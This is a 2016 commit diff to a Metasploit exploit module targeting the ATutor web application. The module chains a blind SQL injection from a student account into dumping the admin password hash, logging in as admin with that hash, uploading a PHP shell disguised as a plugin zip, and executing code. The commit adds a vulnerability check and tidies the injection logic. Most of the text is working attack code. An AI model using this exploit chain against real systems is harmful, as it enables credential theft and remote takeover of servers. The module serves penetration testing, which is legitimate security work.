Merge new code changes from mr_me

2016-02-29 18:39:52 -06:00 · 2016-02-29 18:39:52 -06:00 · f55835cceb
parent 638d91197e
commit f55835cceb
1 changed files with 43 additions and 27 deletions
--- a/modules/exploits/multi/http/atutor_sqli.rb
+++ b/modules/exploits/multi/http/atutor_sqli.rb
@ -63,6 +63,22 @@ class Metasploit3 < Msf::Exploit::Remote
    super("#{peer} - #{msg}")
  end
  def check
    # the only way to test if the target is vuln
    begin
      test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    rescue Msf::Exploit::Failed => e
      vprint_error(e.message)
      return Exploit::CheckCode::Unknown
    end
    if test_injection(test_cookie)
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end
  def push
    uri = normalize_uri(target_uri.path)
@ -115,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
  def upload_shell(cookie)
    post_data = Rex::MIME::Message.new
    post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
-    post_data.add_part('Install', nil, nil, "form-data; name=\"install_upload\"")
+    post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
    data = post_data.to_s
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
@ -145,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
    end
    # auth failed if we land here, bail
-    fail_with(Failure::NoAccess, "Upload did not work")
+    fail_with(Failure::Unknown, "Unable to upload php code")
    return false
  end
@ -275,19 +291,19 @@ class Metasploit3 < Msf::Exploit::Remote
  def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
    if do_test
-       if do_true
+      if do_true
-          result = perform_request("1=1", cookie)
+        result = perform_request("1=1", cookie)
-          if result =~ /There are \d entries./
+        if result =~ /There are \d entries./
-             return true
+          return true
-          end
+        end
-       else not do_true
+      else not do_true
-          result = perform_request("1=2", cookie)
+        result = perform_request("1=2", cookie)
-          if not result =~ /There are \d entries./
+        if not result =~ /There are \d entries./
-             return true
+          return true
-          end
+        end
-       end
+      end
-    else not do_test and sql
+    elsif not do_test and sql
-       return get_ascii_value(sql, cookie)
+      return get_ascii_value(sql, cookie)
    end
  end
@ -332,18 +348,18 @@ class Metasploit3 < Msf::Exploit::Remote
    print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
    report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
-    if test_injection(student_cookie)
+    print_status("Dumping username and password hash...")
-      print_good("Test injection working!")
+    # we got admin hash now
-      print_status("Dumping username and password hash...")
+    credz = dump_the_hash(student_cookie)
-      credz = dump_the_hash(student_cookie)
+    print_good("Got the #{credz[0]} hash: #{credz[1]} !")
-      print_good("Got the #{credz[0]} hash: #{credz[1]} !")
+    if credz
-      if credz
+      admin_cookie = login(credz[0], credz[1], true)
-        admin_cookie = login(credz[0], credz[1], true)
+      print_status("Logged in as #{credz[0]}, uploading shell...")
-        print_status("Logged in as #{credz[0]}, uploading shell...")
+      # install a plugin
-        if upload_shell(admin_cookie)
+      if upload_shell(admin_cookie)
-          print_good("Shell upload successful!")
+        print_good("Shell upload successful!")
-          exec_code
+        # boom
-        end
+        exec_code
      end
    end
  end